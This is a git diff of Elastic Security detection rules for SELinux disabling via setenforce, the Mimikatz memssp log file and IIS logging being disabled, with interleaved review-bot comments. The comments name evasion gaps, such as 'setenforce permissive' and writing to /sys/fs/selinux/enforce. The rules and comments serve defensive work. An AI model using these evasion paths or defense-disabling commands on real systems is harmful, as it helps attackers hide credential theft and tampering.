Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_109.json b/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_109.json new file mode 100644 index 00000000000..fa9407afffd --- /dev/null 
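Review bot: `process.args == "0"` in the query only catches the numeric form, so `setenforce Permissive` (setenforce also accepts `Enforcing`/`Permissive`, case-insensitively) puts the system in permissive mode without firing this rule. A one-line widening keeps the rule's shape: `process.name == "setenforce" and process.args : ("0", "permissive")` — EQL's `:` operator matches case-insensitively, so mixed-case spellings are covered as well. This file is version 108 of a rule that appears to be synced from an upstream rule repository, so the change belongs in the rule source rather than in a hand edit of this JSON. The `setup` text also describes only Elastic Defend and Auditbeat while the index list and tags include the Auditd Manager integration; one sentence pointing operators to that integration would avoid guesswork.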
+++ b/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_109.json 
@@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies potential attempts to disable Security-Enhanced Linux (SELinux), which is a Linux kernel security feature to support access control policies. Adversaries may disable security tools to avoid possible detection of their tools and activities.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Disabling of SELinux", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\") and\nevent.type == \"start\" and process.name == \"setenforce\" and process.args == \"0\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "eb9eb8ba-a983-41d9-9c93-a1c05112ca5e", + "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_110.json b/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_110.json new file mode 100644 index 00000000000..8b6820cf4c1 --- /dev/null 
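Review bot: For the two auditd-backed indices (`auditbeat-*`, `logs-auditd_manager.auditd-*`) this rule produces nothing unless the host's audit configuration actually records execve, and the `setup` text never says so; the Defend and Auditbeat install steps are spelled out in full but the audit rule the process events depend on is not mentioned. Suggest adding to the Auditbeat section a line such as `Process events from auditd require an execve syscall rule (e.g. -a always,exit -F arch=b64 -S execve -k exec); without it setenforce invocations are not logged and this rule stays silent.` The exact rule syntax should be confirmed against the auditd_manager documentation, and the same gap exists in versions 108 and 110 of this rule added by the same commit. Separately, the query still keys only on argument `0`, so `setenforce permissive` is not covered by this version either.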
+++ b/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_110.json 
@@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies potential attempts to disable Security-Enhanced Linux (SELinux), which is a Linux kernel security feature to support access control policies. Adversaries may disable security tools to avoid possible detection of their tools and activities.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Disabling of SELinux", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\")\n and process.name == \"setenforce\" and process.args == \"0\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "eb9eb8ba-a983-41d9-9c93-a1c05112ca5e", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6_108.json b/packages/security_detection_engine/kibana/security_rule/ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6_108.json new file mode 100644 index 00000000000..1c51d181bcf --- /dev/null 
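Review bot: This newest version still detects only the `setenforce 0` spelling (`process.args == "0"`), so `setenforce permissive` evades it, and the other common ways to neuter SELinux — writing `0` to `/sys/fs/selinux/enforce` or changing `SELINUX=` in `/etc/selinux/config` — are out of scope entirely despite the rule name "Potential Disabling of SELinux". The cheap fix for the first gap is `process.args : ("0", "permissive")`; the other paths call for a companion file-event rule on those two paths rather than a widening of this process query. The limitation is worth recording in `description` or `note` so analysts do not read an absence of alerts as SELinux being intact, e.g. `Only the setenforce command is covered; edits to /etc/selinux/config or writes to /sys/fs/selinux/enforce are not.`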
+++ b/packages/security_detection_engine/kibana/security_rule/ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6_108.json 
@@ -0,0 +1,86 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the password log file from the default Mimikatz memssp module.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Mimikatz Memssp Log File Detected", + "note": "## Triage and analysis\n\n### Investigating Mimikatz Memssp Log File Detected\n\n[Mimikatz](https://github.com/gentilkiwi/mimikatz) is an open-source tool used to collect, decrypt, and/or use cached credentials. This tool is commonly abused by adversaries during the post-compromise stage where adversaries have gained an initial foothold on an endpoint and are looking to elevate privileges and seek out additional authentication objects such as tokens/hashes/credentials that can then be used to laterally move and pivot across a network.\n\nThis rule looks for the creation of a file named `mimilsa.log`, which is generated when using the Mimikatz misc::memssp module, which injects a malicious Windows SSP to collect locally authenticated credentials, which includes the computer account password, running service credentials, and any accounts that logon.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate potentially compromised accounts. 
Analysts can do this by searching for login events (e.g., 4624) to the target host.\n- Retrieve and inspect the log file contents.\n- Search for DLL files created in the same location as the log file, and retrieve unsigned DLLs.\n - Use the PowerShell Get-FileHash cmdlet to get the SHA-256 hash value of these files.\n - Search for the existence of these files in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n - Identify the process that created the DLL using file creation events.\n\n### False positive analysis\n\n- This file name `mimilsa.log` should not legitimately be created.\n\n### Related rules\n\n- Mimikatz Powershell Module Activity - ac96ceb8-4399-4191-af1d-4feeac1f1f46\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the host is a Domain Controller (DC):\n - Activate your incident response plan for total Active Directory compromise.\n - Review the privileges assigned to users that can access the DCs to ensure that the least privilege principle is being followed and reduce the attack surface.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Reboot the host to remove the injected SSP from memory.\n- Reimage the host operating system or restore compromised files to clean versions.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and file.name : \"mimilsa.log\" and process.name : \"lsass.exe\"\n", + "references": [ + "https://www.elastic.co/security-labs/detect-credential-access" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ 
+ {
+ "id": "T1003",
+ "name": "OS Credential Dumping",
+ "reference": "https://attack.mitre.org/techniques/T1003/"
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "eql",
+ "version": 108
+ },
+ "id": "ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6_108",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6_109.json b/packages/security_detection_engine/kibana/security_rule/ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6_109.json
new file mode 100644
index 00000000000..ed9100f21b1
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6_109.json
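Review bot: The first investigation step in `note` ("Investigate the script execution chain (parent process tree) for unknown processes") reads as copied from a PowerShell rule and does not fit this query: the writing process is `lsass.exe`, whose parent is always `wininit.exe`, so walking the parent tree yields nothing useful. The productive pivot is whichever process obtained a handle to or injected into LSASS just before the file appeared; suggest replacing that bullet with `Identify processes that accessed or injected into lsass.exe shortly before the log file was written (for example Sysmon Event ID 10 ProcessAccess events targeting lsass.exe) and examine their executables for prevalence and signature.` The note also says the rule looks for the file's creation, but the query carries no `event.type` filter, so every append by the SSP raises a separate alert — acceptable for detection, but the wording should say "creation or modification" so analysts are not surprised by repeated hits.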
@@ -0,0 +1,86 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the password log file from the default Mimikatz memssp module.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.file-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Mimikatz Memssp Log File Detected", + "note": "## Triage and analysis\n\n### Investigating Mimikatz Memssp Log File Detected\n\n[Mimikatz](https://github.com/gentilkiwi/mimikatz) is an open-source tool used to collect, decrypt, and/or use cached credentials. This tool is commonly abused by adversaries during the post-compromise stage where adversaries have gained an initial foothold on an endpoint and are looking to elevate privileges and seek out additional authentication objects such as tokens/hashes/credentials that can then be used to laterally move and pivot across a network.\n\nThis rule looks for the creation of a file named `mimilsa.log`, which is generated when using the Mimikatz misc::memssp module, which injects a malicious Windows SSP to collect locally authenticated credentials, which includes the computer account password, running service credentials, and any accounts that logon.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate potentially compromised accounts. 
Analysts can do this by searching for login events (e.g., 4624) to the target host.\n- Retrieve and inspect the log file contents.\n- Search for DLL files created in the same location as the log file, and retrieve unsigned DLLs.\n - Use the PowerShell Get-FileHash cmdlet to get the SHA-256 hash value of these files.\n - Search for the existence of these files in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n - Identify the process that created the DLL using file creation events.\n\n### False positive analysis\n\n- This file name `mimilsa.log` should not legitimately be created.\n\n### Related rules\n\n- Mimikatz Powershell Module Activity - ac96ceb8-4399-4191-af1d-4feeac1f1f46\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the host is a Domain Controller (DC):\n - Activate your incident response plan for total Active Directory compromise.\n - Review the privileges assigned to users that can access the DCs to ensure that the least privilege principle is being followed and reduce the attack surface.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Reboot the host to remove the injected SSP from memory.\n- Reimage the host operating system or restore compromised files to clean versions.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and file.name : \"mimilsa.log\" and process.name : \"lsass.exe\"\n", + "references": [ + "https://www.elastic.co/security-labs/detect-credential-access" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ 
+ {
+ "id": "T1003",
+ "name": "OS Credential Dumping",
+ "reference": "https://attack.mitre.org/techniques/T1003/"
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "eql",
+ "version": 109
+ },
+ "id": "ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6_109",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/ebf1adea-ccf2-4943-8b96-7ab11ca173a5_109.json b/packages/security_detection_engine/kibana/security_rule/ebf1adea-ccf2-4943-8b96-7ab11ca173a5_109.json
new file mode 100644
index 00000000000..ef186d91952
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/ebf1adea-ccf2-4943-8b96-7ab11ca173a5_109.json
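Review bot: Version 109 narrows the index to `logs-endpoint.events.file-*` but leaves the rule keyed solely on the default filename `mimilsa.log`; that name is the `misc::memssp` module's default, and a rebuilt or hand-patched mimikatz can presumably log under another name, so this is an indicator match rather than a behavioral detection. Recommend saying so in `description` or `note` (e.g. `This rule matches the default memssp log name only; renamed builds will not trigger it.`) and pairing it with a companion behavioral rule — lsass.exe writing new files under the Windows directory is a candidate, to be validated for false positives — rather than widening this query and inviting noise. The `## Setup` remark about populating `event.ingested` on pre-8.2 beats indices should stay, since `timestamp_override` depends on that field.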
@@ -0,0 +1,110 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "Identifies when Internet Information Services (IIS) HTTP Logging is disabled on a server. An attacker with IIS server access via a webshell or other mechanism can disable HTTP Logging as an effective anti-forensics measure.",
+ "from": "now-9m",
+ "index": [
+ "winlogbeat-*",
+ "logs-endpoint.events.*",
+ "logs-windows.*",
+ "endgame-*",
+ "logs-system.security*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "max_signals": 33,
+ "name": "IIS HTTP Logging Disabled",
+ "note": "## Triage and analysis\n\n### Investigating IIS HTTP Logging Disabled\n\nIIS (Internet Information Services) is a Microsoft web server software used to host websites and web applications on Windows. It provides features for serving dynamic and static content, and can be managed through a graphical interface or command-line tools.\n\nIIS logging is a data source that can be used for security monitoring, forensics, and incident response. It contains mainly information related to requests done to the web server, and can be used to spot malicious activities like webshells. Adversaries can tamper, clear, and delete this data to evade detection, cover their tracks, and slow down incident response.\n\nThis rule monitors commands that disable IIS logging.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - Verify if any other anti-forensics behaviors were observed.\n- Verify whether the logs stored in the `C:\\inetpub\\logs\\logfiles\\w3svc1` directory were deleted after this action.\n- Check if this operation is done under change management and approved according to the organization's policy.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Re-enable affected logging components, services, and security monitoring.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"appcmd.exe\" or ?process.pe.original_file_name == \"appcmd.exe\") and\n process.args : \"/dontLog*:*True\" and\n not process.parent.name : \"iissetup.exe\"\n",
+ "related_integrations": [
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ },
+ {
+ "package": "windows",
+ "version": "^1.5.0"
+ },
+ {
+ "package": "system",
+ "version": "^1.6.4"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.pe.original_file_name",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 73,
+ "rule_id": "ebf1adea-ccf2-4943-8b96-7ab11ca173a5",
